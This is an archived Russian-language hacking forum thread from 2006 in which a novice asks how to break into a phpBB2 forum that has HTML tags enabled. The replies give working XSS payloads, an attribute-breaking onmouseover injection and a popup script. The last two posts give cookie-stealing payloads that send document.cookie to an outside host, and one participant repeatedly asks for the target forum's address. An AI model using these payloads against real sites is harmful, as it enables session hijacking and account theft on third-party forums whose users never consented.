PDA

Просмотр полной версии : PHPbb2 нашел форму где html-тэг ON


mr-troy
18.12.2006, 16:09
Вто нашел такой форум, где хтмл тэги включены, как можно сломать?
не бейте сильно, я только учусь :) ;)

delay(0)
18.12.2006, 17:04
xss
<pre a='>' onmouseover='alert(/XSS/)' b='<pre' >

mr-troy
18.12.2006, 17:08
xss
я одном топике ответил данным сообщением, вывелось вот это:
<pre>
а что дальше? можешь в аську стукнуть? или тут написать?

EPIDEM
18.12.2006, 19:01
дай сцылу =)

mr-troy
18.12.2006, 20:10
гы..я ломать ничего не хочу :)
просто хочу понять уязвимость.

genom--
18.12.2006, 20:29
эта уязвимость называется xss -- что расшифоровывается как крос сайт скриптингъъъ -- вообщем можно вставлять --- любой текст -- подумай сам если вставить javascript код -- то браузер его воспримет как код и выполнит --- =) лол

mr-troy
18.12.2006, 21:38
эта уязвимость называется xss -- что расшифоровывается как крос сайт скриптингъъъ -- вообщем можно вставлять --- любой текст -- подумай сам если вставить javascript код -- то браузер его воспримет как код и выполнит --- =) лол
ОО спасибо, т.е вместо скрипта XSS могу любой яваскрипт вставить :)
а чтобы права расширить свои, какие скрипты посоветуете? )

mr-troy
18.12.2006, 21:47
<pre a='>' onmouseover='alert(/<script language="JavaScript">
WOweb=window.open("ВЗЛОМ/","mr-troy", "width=200, height=143, toolbar=0, location=0, status=0, menubar=0, scrollbars=0, resizable=0,left=1,top=1")
</script>)' b='<pre' >

Вот так работаеть будет? Типа всплывающее окно.

EPIDEM
19.12.2006, 13:08
дай фсетаки форум =)
ломать не буим но посмеёмся =))

Kaban
22.12.2006, 10:49
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>

читай статьи про XSS, там описано как что сделать...

~!DoK_tOR!~
23.12.2006, 21:39
<img src=''http://antichat.ru/cgi-bin/s.jpg'' style=background:url(javascript:document.images[1].src=''http://antichat.ru/s.jpg?''+document.cookie)>